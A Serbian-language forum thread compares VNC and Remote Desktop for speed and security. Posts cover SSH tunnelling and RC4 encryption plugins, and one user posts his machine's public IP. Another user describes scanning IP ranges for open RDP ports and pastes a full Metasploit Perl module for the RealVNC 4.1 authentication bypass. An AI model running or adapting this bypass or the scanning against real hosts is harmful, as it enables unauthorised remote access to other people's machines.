VNC kao kroz sir
- Začetnik teme Suvi
- Datum pokretanja
OP
OP
Suvi
Čuven
- Učlanjen(a)
- 24.12.2001
- Poruke
- 228
- Poena
- 619
salac je napisao(la):
Mislio sam na sigurnost
Probao sam samo jednom od kuce sa wireless-a, i jednom sa posla, dialup. Sutra kad sam otisao na posao, negde oko 11 sati je bio upad. Mislim, bilo je brzo...Nisam na Ultra VNC upeo da pronadjem SSH. Gde se to podesava?
Hvala.
- Učlanjen(a)
- 28.08.2001
- Poruke
- 2,793
- Poena
- 679
Ja sam koristio tihtvnc + ssh tunnelin. Za ultravnc se to izgleda radi malo drugacije, potrebno je instalirati DSM modul za kripciju http://msrc4plugin.home.comcast.net/index.html (google ftw!).
poz.
poz.
Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
ej - kad stavis VNC - daj mi adresu da ti konfigurisem
OP
OP
Suvi
Čuven
- Učlanjen(a)
- 24.12.2001
- Poruke
- 228
- Poena
- 619
Crash Owerride je napisao(la):ej - kad stavis VNC - daj mi adresu da ti konfigurisem
Probaj
IP je 213.198.238.60. Ultra VNC v.1.0.0 RC20.3salac je napisao(la):
Radi, rc4.key nosis sa sobom. Nadam se da je ovo dovoljno sigurno.
Hvala puno, opet.
Poslednja izmena od urednika:
- Učlanjen(a)
- 28.08.2001
- Poruke
- 2,793
- Poena
- 679
Suvi je napisao(la):
Vise nego dovoljno sigurno.
poz.
veske je napisao(la):imA LI neki tutorijal za to snifovanje
Naravno da postoje tutoriali, google-uj i izletece ti sigurno par hiljada hitova.
Poslednja izmena od urednika:
Swiper
Čuven
- Učlanjen(a)
- 05.03.2002
- Poruke
- 4,657
- Poena
- 765
offtopic: koji od ovih programa najbrze radi? ne treba mi brdo opcija vec samo da radi brzo. U startu otpisujem remote desktop [ne zbog brzine vec zbog nemogucnosti logovanja 2 usera istovremeno - ako gresim ispravite me]
Poslednja izmena:
- Učlanjen(a)
- 04.06.2002
- Poruke
- 6,337
- Poena
- 985
Ne treba da odbacujes remote desktop:
http://www.benchmark.co.yu/forum/showpost.php?p=881448&postcount=9
http://www.benchmark.co.yu/forum/showpost.php?p=881448&postcount=9
Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
VNC je naJbrzi ali ne i najbezbednijiSwiper je napisao(la):
Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
Meni jeste.jaksa je napisao(la):
Spaja se za maximalno jednu sekundu, dok remote pc ili bilo koji drugi 3 do 4 sekunde.
I ne samo spajanje - uopste - ako je remote masina dobra ( ima dovoljno ram-a i dobru internet brzinu ) - VNC mi je najbolji.
Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
Verujem oba
gmlale
Čuven
- Učlanjen(a)
- 09.12.2003
- Poruke
- 798
- Poena
- 630
Moja oprema
- Mobilni telefon
- 063626864
- Pristup internetu
- Optički internet
Kolika je opasnost da se provali sifra ako ide preko remote desktopa ako neko spolja snifuje saobracaj.
Ja licno pristupam sa remote desktopom kucnom pc-ju, imam na routeru forwardovan port 3389 na odredjenu ip adresu i to radi ok, no zanima me koliko je moguce da mi neko mazne sifru prilikom takve konekcije.
A sto setice brzine RD ima opcije za ubrzanje, tipa boje i rezolucije koje mozes da smanjis, a mozes i staviti da koristis 28.8 modem sto ti isto ubrzava rad.
Ja licno pristupam sa remote desktopom kucnom pc-ju, imam na routeru forwardovan port 3389 na odredjenu ip adresu i to radi ok, no zanima me koliko je moguce da mi neko mazne sifru prilikom takve konekcije.
A sto setice brzine RD ima opcije za ubrzanje, tipa boje i rezolucije koje mozes da smanjis, a mozes i staviti da koristis 28.8 modem sto ti isto ubrzava rad.
Poslednja izmena:
- Učlanjen(a)
- 04.06.2002
- Poruke
- 6,337
- Poena
- 985
Filo
Čuven
- Učlanjen(a)
- 28.12.2001
- Poruke
- 3,703
- Poena
- 710
ili ako si bas paranoja
http://www.petri.co.il/securing_rdp_communications.htm
http://www.petri.co.il/securing_rdp_communications.htm
Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
Moze, ako skenira range od recimo 1.1.1.1 do 1.255.255.255 koja masina ima otvoreni port 3389.gmlale je napisao(la):
Password mora da ti bude jak, a za sada neznam exploit za najnoviju verziju remote desktopa.
VNC JESTE najbrzi - tvrdim, ali ako se ne konfigurise dobro moze da bude i opasan - laka meta - postoji exploit koji [provereno] radi na bar 100.000 masina trenutno.
Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
pa prvo se valjda skeniraju otvoreni portovi, pa se onda radi ostalo.
1.1.1.1 do 1.255.255.255 sam samo naveo kao primer
1.1.1.1 do 1.255.255.255 sam samo naveo kao primer
Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
Pa posle ima javni exploit za VNC auth bypass
koji izgleda ovako:
koji izgleda ovako:
Kod:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::realvnc_41_bypass;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced = {};
my $info =
{
'Name' => 'RealVNC 4.1 Authentication Bypass',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm[at]metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits an authentication bypass flaw in version
4.1.0 and 4.1.1 of the RealVNC service. This module acts as a proxy
between a VNC client and a vulnerable server. Credit for this should
go to James Evans, who spent the time to figure this out after RealVNC
released a binary-only patch.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'LPORT' => [ 1, 'PORT', 'The local VNC listener port', 5900 ],
'LHOST' => [ 1, 'HOST', 'The local VNC listener host', "0.0.0.0" ],
'RPORT' => [ 1, 'PORT', 'The remote VNC target port', 5900 ],
'RHOST' => [ 1, 'HOST', 'The remote VNC target host'],
'AUTOCONNECT' => [1, 'DATA', 'Automatically launch vncviewer', 1],
},
'Refs' =>
[
['URL', 'http://secunia.com/advisories/20107/']
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'RealVNC' ],
],
'Keys' => [ 'realvnc' ],
'DisclosureDate' => 'May 15 2006',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Exploit
{
my $self = shift;
my $server = IO::Socket::INET->new(
LocalHost => $self->GetVar('LHOST'),
LocalPort => $self->GetVar('LPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
my $client;
# Did the listener create fail?
if (not defined($server))
{
$self->PrintLine("[-] Failed to create local VNC listener on " . $self->GetVar('SSHDPORT'));
return;
}
if ($self->GetVar('AUTOCONNECT') =~ /^(T|Y|1)/i) {
if (! fork()) {
system("vncviewer 127.0.0.1::".$self->GetVar('LPORT'));
exit(0);
}
}
$self->PrintLine("[*] Waiting for VNC connections to " . $self->GetVar('LHOST') . ":" . $self->GetVar('LPORT') . "...");
while (defined($client = $server->accept()))
{
$self->HandleVNCClient(fd => Msf::Socket::Tcp->new_from_socket($client));
}
return;
}
# Stolen from InjectVNCStage.pm
sub HandleVNCClient
{
my $self = shift;
my ($fd) = @{{@_}}{qw/fd/};
my $rhost;
my $rport;
# Set the remote host information
($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
# Create a connection to the target system
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Could not connect to the target VNC service: ' . $s->GetError);
$fd->Close;
return;
}
my $res = $s->Recv(-1, 5);
# Hello from server
if ($res !~ /^RFB 003\.008/) {
$self->PrintLine("[*] The remote VNC service is not vulnerable");
$fd->Close;
$s->Close;
return;
}
# Send it to the client
$fd->Send($res);
# Hello from client
$res = $fd->Recv(-1, 5);
if ($res !~ /^RFB /) {
$self->PrintLine("[*] The local VNC client appears to be broken");
$fd->Close;
$s->Close;
return;
}
# Send it to the server
$s->Send($res);
# Read the authentication methods from the server
$res = $s->Recv(-1, 5);
# Tell the client that the server only supports NULL auth
$fd->Send("\x01\x01");
# Start pumping data between the client and server
if (! fork()) {
$self->PrintLine("[*] Proxying data between the connections...");
$self->VNCProxy($s->Socket, $fd->Socket);
exit(0);
}
return;
}
sub VNCProxy {
my $self = shift;
my $srv = shift;
my $cli = shift;
foreach ($srv, $cli) {
$_->blocking(1);
$_->autoflush(1);
}
my $selector = IO::Select->new($srv, $cli);
LOOPER:
while(1) {
my @ready = $selector->can_read;
foreach my $ready (@ready) {
if($ready == $cli) {
my $data;
$cli->recv($data, 8192);
last LOOPER if (! length($data));
last LOOPER if(!$srv || !$srv->connected);
eval { $srv->send($data); };
last LOOPER if $@;
}
elsif($ready == $srv) {
my $data;
$srv->recv($data, 8192);
last LOOPER if(!length($data));
last LOOPER if(!$cli || !$cli->connected);
eval { $cli->send($data); };
last LOOPER if $@;
}
}
}
}
1;Crash Owerride
Slavan
- Učlanjen(a)
- 01.12.2005
- Poruke
- 1,392
- Poena
- 349
Ja sam recimo isprobao sa iste masine da se konektujem na 10-ak VNC-a i isto toliko RD-a (manje-vise).jaksa je napisao(la):Ok, da ne bih ja stalno tvrdio da je rd najbrzi a neko drugi da je vnc, postavljam pitanje:
u cemu je vnc najbrzi?
kako ste merili brzinu?
da li ste merili brzinu?
I uvek mi se brze konektuje na VNC + radim u "real speed-u" sa jako malim lag-om.
